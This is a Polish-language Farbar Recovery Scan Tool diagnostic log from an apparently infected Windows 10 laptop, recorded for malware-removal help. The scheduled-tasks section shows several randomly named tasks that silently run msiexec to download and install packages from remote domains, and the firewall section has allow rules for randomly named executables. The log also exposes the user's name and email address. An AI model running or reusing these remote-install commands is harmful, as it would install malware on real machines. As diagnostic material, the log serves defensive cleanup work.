Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja: 09.01.2019 Uruchomiony przez lukso (11-01-2019 13:51:22) Uruchomiony z C:\Users\lukso\Documents Windows 10 Home Wersja 1803 17134.523 (X64) (2018-11-16 14:45:34) Tryb startu: Safe Mode (with Networking) ========================================================== ==================== Konta użytkowników: ============================= Administrator (S-1-5-21-337966470-3633895276-3358962371-500 - Administrator - Disabled) Gość (S-1-5-21-337966470-3633895276-3358962371-501 - Limited - Disabled) Konto domyślne (S-1-5-21-337966470-3633895276-3358962371-503 - Limited - Disabled) lukso (S-1-5-21-337966470-3633895276-3358962371-1001 - Administrator - Enabled) => C:\Users\lukso WDAGUtilityAccount (S-1-5-21-337966470-3633895276-3358962371-504 - Limited - Disabled) ==================== Centrum zabezpieczeń ======================== (Załączenie wejścia w fixlist spowoduje jego usunięcie.) AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Zainstalowane programy ====================== (W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.) µTorrent (HKU\S-1-5-21-337966470-3633895276-3358962371-1001\...\uTorrent) (Version: 3.5.4.44846 - BitTorrent Inc.) Adobe (HKLM\...\{4BFF26F4-7ED2-4FC7-B756-C53062C63179}) (Version: 1.0.0000 - Adobe Systems Incorporated) Hidden Adobe Acrobat Reader DC - Polish (HKLM-x32\...\{AC76BA86-7AD7-1045-7B44-AC0F074E4100}) (Version: 19.010.20069 - Adobe Systems Incorporated) Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 4.4.1.298 - Adobe Systems Incorporated) Adobe Flash Player 32 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 32.0.0.114 - Adobe Systems Incorporated) Adobe InDesign CC 2018 (HKLM-x32\...\IDSN_13_1) (Version: 13.1 - Adobe Systems Incorporated) Adobe Photoshop CS6 (HKLM-x32\...\{74EB3499-8B95-4B5C-96EB-7B342F3FD0C6}) (Version: 13.0 - Adobe Systems Incorporated) Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment) CCleaner (HKLM\...\CCleaner) (Version: 5.51 - Piriform) Conexant HD Audio (HKLM\...\CNXT_AUDIO_HDA) (Version: 8.66.16.50 - Conexant) Dolby Digital Plus Advanced Audio (HKLM\...\{B0BFC63F-EA07-419E-960B-3FB2ED5DD0B2}) (Version: 7.6.5.1 - Dolby Laboratories Inc) Driver Easy 5.0.8 (HKLM\...\DriverEasy_is1) (Version: 5.0.8 - Easeware) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 70.0.3538.110 - Google Inc.) Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.17 - Google Inc.) Hidden Hearthstone (HKLM-x32\...\Hearthstone) (Version: - Blizzard Entertainment) HyperCam 2 (HKLM-x32\...\HyperCam 2) (Version: 2.29.01 - Hyperionics Technology LLC) IrfanView 4.51 (32-bit) (HKLM-x32\...\IrfanView) (Version: 4.51 - Irfan Skiljan) Lenovo EasyCamera (HKLM-x32\...\{ADE16A9D-FBDC-4ecc-B6BD-9C31E51D0332}) (Version: 3.15.0414.1 - Vimicro) Malwarebytes (wersja 3.6.1.2711) (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.6.1.2711 - Malwarebytes) Microsoft Hyperlapse Pro (HKLM\...\{9B62C270-A729-4759-95D4-E16E5F0DEEED}) (Version: 1.6.116 - Microsoft Corporation) Microsoft Office Professional Plus 2013 (HKLM-x32\...\Office15.PROPLUS) (Version: 15.0.4420.1017 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-337966470-3633895276-3358962371-1001\...\OneDriveSetup.exe) (Version: 18.222.1104.0007 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Narzędzia sprawdzające pakietu Microsoft Office 2013 — polski (HKLM-x32\...\{90150000-001F-0415-0000-0000000FF1CE}) (Version: 15.0.4420.1017 - Microsoft Corporation) Hidden Panel sterowania NVIDIA 391.35 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.ControlPanel) (Version: 391.35 - NVIDIA Corporation) Hidden PDF Settings CS6 (HKLM-x32\...\{BFEAAE77-BD7F-4534-B286-9C5CB4697EB1}) (Version: 11.0 - Adobe Systems Incorporated) Hidden Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.10586.31222 - Realtek Semiconduct Corp.) Spotify (HKU\S-1-5-21-337966470-3633895276-3358962371-1001\...\Spotify) (Version: 1.0.96.181.gf6bc1b6b - Spotify AB) Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation) Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{9CBA860F-7437-4A75-941C-8EF559F2D145}) (Version: 2.52.0.0 - Microsoft Corporation) Vulkan Run Time Libraries 1.0.26.0 (HKLM\...\VulkanRT1.0.26.0) (Version: 1.0.26.0 - LunarG, Inc.) WinRAR 5.61 (32-bitowy) (HKLM-x32\...\WinRAR archiver) (Version: 5.61.0 - win.rar GmbH) ==================== Niestandardowe rejestracje CLSID (filtrowane): ========================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) CustomCLSID: HKU\S-1-5-21-337966470-3633895276-3358962371-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\Windows\system32\igfxEM.exe (Intel Corporation) CustomCLSID: HKU\S-1-5-21-337966470-3633895276-3358962371-1001_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems) ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2018-02-10] () ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2018-02-10] () ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2018-02-10] () ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2018-02-10] () ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2018-10-27] (Alexander Roshal) ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2018-10-27] (Alexander Roshal) ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-09-19] (Malwarebytes) ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Brak pliku ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\Windows\system32\igfxDTCM.dll [2018-11-16] (Intel Corporation) ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2018-03-24] (NVIDIA Corporation) ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2018-02-10] () ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-09-19] (Malwarebytes) ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2018-10-27] (Alexander Roshal) ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2018-10-27] (Alexander Roshal) ==================== Zaplanowane zadania (filtrowane) ============= (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) Task: {04772090-873D-4222-90E7-933771A1BE64} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe Task: {251DC03A-95C5-46A6-A10B-3F5AB521DE66} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: {26BE9BE3-76F2-495F-B2C0-E77750A604C8} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_114_pepper.exe [2019-01-08] (Adobe Systems Incorporated) Task: {3D1C6D75-D0FF-4E8C-9B76-59843A55B93D} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\MpCmdRun.exe [2018-12-11] (Microsoft Corporation) Task: {427AA132-3A82-4623-9609-53FB54BBC7C4} - System32\Tasks\ezdmwecrnlc => "msiexec" -package hxxps://superdomain1709.info/owgenedhwhetgux.czl /q Task: {65B85F6F-35B3-4459-A179-28255D5B7B25} - System32\Tasks\Microsoft\Windows\HelloFace\FODCleanupTask => C:\Windows\System32\WinBioPlugIns\FaceFodUninstaller.exe [2018-04-12] () Task: {73951CF5-05A3-4836-96F5-029202B798C2} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2018-12-10] (Piriform Software Ltd) Task: {78B52068-B395-42EE-B485-3EE8A03A9C47} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2012-10-01] (Microsoft Corporation) Task: {8967787B-C2C4-415F-92FB-9A6104CD07FA} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\MpCmdRun.exe [2018-12-11] (Microsoft Corporation) Task: {9262C57E-DF08-4C88-93F8-AFC9AC320D0B} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\MpCmdRun.exe [2018-12-11] (Microsoft Corporation) Task: {9707D830-3872-4CCA-8D2A-30D2E986AF56} - System32\Tasks\{D5B932B9-3985-32FE-D668-A92C0C99F269} => "msiexec" -q -i hxxps://refreshnerer711rb.info/27ZTRO1A.0xJ Task: {9E17146A-31A8-4B2A-949D-96A9E2E4ADBE} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2019-01-08] (Adobe Systems Incorporated) Task: {B8D09B37-02D5-4F39-BE13-78796ADD911C} - System32\Tasks\Driver Easy Scheduled Scan => C:\Program Files\Easeware\DriverEasy\DriverEasy.exe [2016-07-21] (Easeware) Task: {BB0FC93A-22BD-4779-895C-CC5AAB0E9039} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2012-10-01] (Microsoft Corporation) Task: {BED1B716-2C43-4F33-A2B7-A88A742F4E79} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\MpCmdRun.exe [2018-12-11] (Microsoft Corporation) Task: {CDD9A494-CB55-44C5-A970-0D5DC1144CFA} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-08-14] (Adobe Systems Incorporated) Task: {D72C5F59-4773-4D71-AA38-09C0402F03B1} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [2018-12-10] (Piriform Ltd) Task: {E11C1224-18FB-43FA-B2A9-FDD2B146CCC4} - System32\Tasks\iaudponxwesd => "msiexec" /q -package hxxps://superdomain1709.info/eqbowylofjawmao.gep Task: {E5938C20-206F-4B0F-9E1F-26EF149DFB71} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: {F8177392-591F-496C-BFF3-0D867D7C33D1} - System32\Tasks\AdobeGCInvoker-1.0-MicrosoftAccount-lukson.lukson@hotmail.com => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [2018-05-11] (Adobe Systems, Incorporated) (Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.) Task: C:\Windows\Tasks\CreateExplorerShellUnelevatedTask.job => C:\Windows\explorer.exe Task: C:\Windows\Tasks\Driver Easy Scheduled Scan.job => C:\Program Files\Easeware\DriverEasy\DriverEasy.exe ==================== Skróty & WMI ======================== (Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.) ==================== Załadowane moduły (filtrowane) ============== 2018-12-07 16:49 - 2018-12-21 09:07 - 002712432 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\SelfProtectionSdk.dll 2018-04-12 00:34 - 2018-04-12 00:34 - 000491744 _____ () C:\Windows\System32\InputHost.dll 2018-02-10 01:12 - 2018-02-10 01:12 - 000614856 _____ () C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll 2019-01-09 12:49 - 2019-01-01 07:42 - 002185728 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll 2018-12-13 11:29 - 2018-12-13 11:33 - 000182272 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.36.52.0_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe ==================== Alternate Data Streams (filtrowane) ========= (Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.) ==================== Tryb awaryjny (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMSwissArmy => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMSwissArmy => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="2" ==================== Powiązania plików (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.) ==================== Internet Explorer - Witryny zaufane i z ograniczeniami =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.) ==================== Hosts - zawartość: =============================== (Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.) 2018-04-12 00:38 - 2018-12-07 16:13 - 000000824 _____ C:\Windows\system32\Drivers\etc\hosts ==================== Inne obszary ============================ (Obecnie brak automatycznej naprawy dla tej sekcji.) HKU\S-1-5-21-337966470-3633895276-3358962371-1001\Control Panel\Desktop\\Wallpaper -> DNS Servers: Urządzenie nie jest podłączone do internetu. HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: ) Zapora systemu Windows [funkcja włączona] ==================== MSCONFIG/TASK MANAGER - Wyłączone elementy == Załączenie wejścia w fixlist spowoduje jego usunięcie. ==================== Reguły Zapory systemu Windows (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) FirewallRules: [{670A1204-3FB3-4A0B-BDBF-357716E2BEBC}] => (Allow) C:\Users\lukso\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc.) FirewallRules: [{248C1A03-EE56-434A-9536-EF95BE620CF7}] => (Allow) C:\Users\lukso\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc.) FirewallRules: [{8E05988E-3ACB-45AB-B7C0-9D42B16D0001}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve Corporation) FirewallRules: [{70AC8295-6B23-476B-8FFE-8316F38EAB41}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve Corporation) FirewallRules: [{F6ACB446-6B3D-4839-8B01-2623906F3C85}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Team Fortress 2\hl2.exe () FirewallRules: [{6789F16A-5BB4-4317-9140-8E79C4EB801E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Team Fortress 2\hl2.exe () FirewallRules: [{68BF4951-A4EB-4748-8CD3-BDB51AB21CC9}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\lync.exe (Microsoft Corporation) FirewallRules: [{826670E4-477B-41BA-B9CB-F9129178E9D3}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\lync.exe (Microsoft Corporation) FirewallRules: [{56638EC7-75D9-4DB5-A518-7A0062C30767}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\UcMapi.exe (Microsoft Corporation) FirewallRules: [{4D0C9946-6DA6-48B5-A7A4-CB34B6C8E835}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\UcMapi.exe (Microsoft Corporation) FirewallRules: [{EBE5441F-6F10-4D30-A7FD-A03F081420F8}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) FirewallRules: [{D2C94F92-2FA0-42B6-AF07-D4D47704D623}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corporation) FirewallRules: [{7C094AA4-BFCF-40D4-A906-E60FB9EE1BDF}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corporation) FirewallRules: [TCP Query User{D0A8915C-AC03-4CC4-8D13-43E78F12CD13}C:\users\lukso\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\lukso\appdata\roaming\spotify\spotify.exe (Spotify Ltd) FirewallRules: [UDP Query User{7C03B3FB-5553-4FC5-BD3F-8A13C0B59F77}C:\users\lukso\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\lukso\appdata\roaming\spotify\spotify.exe (Spotify Ltd) FirewallRules: [TCP Query User{305D1312-CFFC-4BAD-AADF-6BDEA7602965}C:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) C:\program files (x86)\hearthstone\hearthstone.exe () FirewallRules: [UDP Query User{316DAE7C-ADE0-418B-8F47-34217BA3E40F}C:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) C:\program files (x86)\hearthstone\hearthstone.exe () FirewallRules: [{0262DC45-AD3F-4B43-9DA8-CCFBF914FD87}] => (Allow) C:\Windows\SysWOW64\msiexec.exe (Microsoft Corporation) FirewallRules: [{0EE4E98D-115C-48E8-A827-DB43FDC70AA2}] => (Allow) C:\Windows\SysWOW64\rOHFHYGya.exe (Microsoft Corporation) FirewallRules: [{2D5C9A37-C86B-48D4-A65B-037A42DF0E55}] => (Allow) C:\Program Files (x86)\aXIafdbFU.exe (Microsoft Corporation) FirewallRules: [{85A8EE30-13C0-40EA-B388-AAA8DF71ACE2}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Ltd) FirewallRules: [{77ABCE37-7F71-46C1-82E2-8523B52AE2D5}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Ltd) FirewallRules: [{2F939A95-09F7-4AAB-932A-5B52F448A61D}] => (Allow) C:\Windows\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{A2E995E6-3FC0-4197-87F6-D2F195DD9572}] => (Allow) C:\Windows\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{8841998D-A736-4F09-A693-45C0DEA68CCE}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{5961E44A-DAF5-429C-8899-8FCD3ECCB187}] => (Allow) C:\Windows\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{092463A2-2338-41D0-8258-F09C60B76934}] => (Allow) C:\Windows\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{BA8B45F9-1626-4548-AB80-1A761DE6753A}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{C3A7D9AA-9A39-4327-A23E-B79B9F85AF4D}] => (Allow) C:\Windows\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{53D4A416-9ADF-43FC-ADF6-7198011EAD14}] => (Allow) C:\Windows\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{505432B6-D96F-444A-AAA7-52AD750C92A1}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{A618FE67-3717-47CB-B1CA-CBBD9184E957}] => (Allow) C:\Windows\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{2FF74A1C-AFFF-4A74-96AB-E035FB8E80A3}] => (Allow) C:\Windows\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{AD622278-6236-4CD5-8CF8-1CDA45CF563E}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{90A06515-AE2F-4A5E-B91B-F907C2008A00}] => (Allow) C:\Windows\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{E37426A4-760A-4753-BAA0-A04A66917A4F}] => (Allow) C:\Windows\SysWOW64\tracert.exe (Microsoft Corporation) FirewallRules: [{0E6D281C-3E39-448A-AF14-8EFDA9F25050}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) ==================== Punkty Przywracania systemu ========================= UWAGA: Przywracanie systemu jest wyłączone ==================== Wadliwe urządzenia w Menedżerze urządzeń ============= Name: Audio dla wyświetlaczy Intel(R) Description: Audio dla wyświetlaczy Intel(R) Class Guid: {4d36e96c-e325-11ce-bfc1-08002be10318} Manufacturer: Intel(R) Corporation Service: IntcDAud Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31) Resolution: Update the driver Name: Broadcom 802.11n Network Adapter Description: Broadcom 802.11n Network Adapter Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318} Manufacturer: Broadcom Service: BCMWL63A Problem: : Windows cannot initialize the device driver for this hardware. (Code 37) Resolution: The driver returned failure from its DriverEntry routine. Uninstall the driver, and then click "Scan for hardware changes" to reinstall or upgrade the driver. Name: Conexant SmartAudio HD Description: Conexant SmartAudio HD Class Guid: {4d36e96c-e325-11ce-bfc1-08002be10318} Manufacturer: Conexant Service: CnxtHdAudService Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31) Resolution: Update the driver ==================== Błędy w Dzienniku zdarzeń: ========================= Dziennik Aplikacja: ================== Error: (01/11/2019 01:47:53 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: Program FRST64 (1).exe w wersji 9.1.2019.0 przestał współpracować z systemem Windows i został zamknięty. Aby sprawdzić, czy jest dostępnych więcej informacji na temat tego problemu, sprawdź historię problemu w oknie Zabezpieczenia i konserwacja w Panelu sterowania. Identyfikator procesu: 66c Godzina rozpoczęcia: 01d4a9abc89bc039 Godzina zakończenia: 4294967295 Ścieżka aplikacji: C:\Users\lukso\Documents\FRST64 (1).exe Identyfikator raportu: 814cde13-825a-49e1-a988-24d932453901 Pełna nazwa pakietu powodującego błąd: Identyfikator aplikacji względem pakietu powodującego błąd: Error: (01/11/2019 01:47:10 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: Program chrome.exe w wersji 70.0.3538.110 przestał współpracować z systemem Windows i został zamknięty. Aby sprawdzić, czy jest dostępnych więcej informacji na temat tego problemu, sprawdź historię problemu w oknie Zabezpieczenia i konserwacja w Panelu sterowania. Identyfikator procesu: c8 Godzina rozpoczęcia: 01d4a9ab0decfc8c Godzina zakończenia: 4294967295 Ścieżka aplikacji: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Identyfikator raportu: e4b603d1-9cc3-42b7-bf24-1c508c910d64 Pełna nazwa pakietu powodującego błąd: Identyfikator aplikacji względem pakietu powodującego błąd: Error: (01/11/2019 01:37:53 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: Program mbamtray.exe w wersji 3.1.0.1662 przestał współpracować z systemem Windows i został zamknięty. Aby sprawdzić, czy jest dostępnych więcej informacji na temat tego problemu, sprawdź historię problemu w oknie Zabezpieczenia i konserwacja w Panelu sterowania. Identyfikator procesu: 1f64 Godzina rozpoczęcia: 01d4a9aa733e4dfc Godzina zakończenia: 4294967295 Ścieżka aplikacji: C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe Identyfikator raportu: 3d75a2c4-62e1-44c7-b99a-cddb7120aefa Pełna nazwa pakietu powodującego błąd: Identyfikator aplikacji względem pakietu powodującego błąd: Error: (01/11/2019 01:36:54 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: Program mbamtray.exe w wersji 3.1.0.1662 przestał współpracować z systemem Windows i został zamknięty. Aby sprawdzić, czy jest dostępnych więcej informacji na temat tego problemu, sprawdź historię problemu w oknie Zabezpieczenia i konserwacja w Panelu sterowania. Identyfikator procesu: 1268 Godzina rozpoczęcia: 01d4a9a9f866d4ba Godzina zakończenia: 4294967295 Ścieżka aplikacji: C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe Identyfikator raportu: 514aa140-de9d-4ae5-8c9f-6d7d0c3b0530 Pełna nazwa pakietu powodującego błąd: Identyfikator aplikacji względem pakietu powodującego błąd: Error: (01/11/2019 01:28:27 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: Program AdwCleaner.exe w wersji 7.2.6.0 przestał współpracować z systemem Windows i został zamknięty. Aby sprawdzić, czy jest dostępnych więcej informacji na temat tego problemu, sprawdź historię problemu w oknie Zabezpieczenia i konserwacja w Panelu sterowania. Identyfikator procesu: 22fc Godzina rozpoczęcia: 01d4a9a8fe7ce017 Godzina zakończenia: 4294967295 Ścieżka aplikacji: C:\Users\lukso\Downloads\AdwCleaner.exe Identyfikator raportu: afdcaea6-9705-40e4-903d-d786e9d1f450 Pełna nazwa pakietu powodującego błąd: Identyfikator aplikacji względem pakietu powodującego błąd: Error: (01/11/2019 01:27:12 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: Program AdwCleaner.exe w wersji 7.2.6.0 przestał współpracować z systemem Windows i został zamknięty. Aby sprawdzić, czy jest dostępnych więcej informacji na temat tego problemu, sprawdź historię problemu w oknie Zabezpieczenia i konserwacja w Panelu sterowania. Identyfikator procesu: 10c4 Godzina rozpoczęcia: 01d4a9a80b41d0f5 Godzina zakończenia: 4294967295 Ścieżka aplikacji: C:\Users\lukso\Downloads\AdwCleaner.exe Identyfikator raportu: 1668bf15-9b20-444d-a353-f4d2a7568b08 Pełna nazwa pakietu powodującego błąd: Identyfikator aplikacji względem pakietu powodującego błąd: Error: (01/11/2019 01:26:59 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: Program mbamtray.exe w wersji 3.1.0.1662 przestał współpracować z systemem Windows i został zamknięty. Aby sprawdzić, czy jest dostępnych więcej informacji na temat tego problemu, sprawdź historię problemu w oknie Zabezpieczenia i konserwacja w Panelu sterowania. Identyfikator procesu: aa4 Godzina rozpoczęcia: 01d4a9a80314859e Godzina zakończenia: 4294967295 Ścieżka aplikacji: C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe Identyfikator raportu: 3e7258a0-bd79-4fa0-818a-e4193b71ff3d Pełna nazwa pakietu powodującego błąd: Identyfikator aplikacji względem pakietu powodującego błąd: 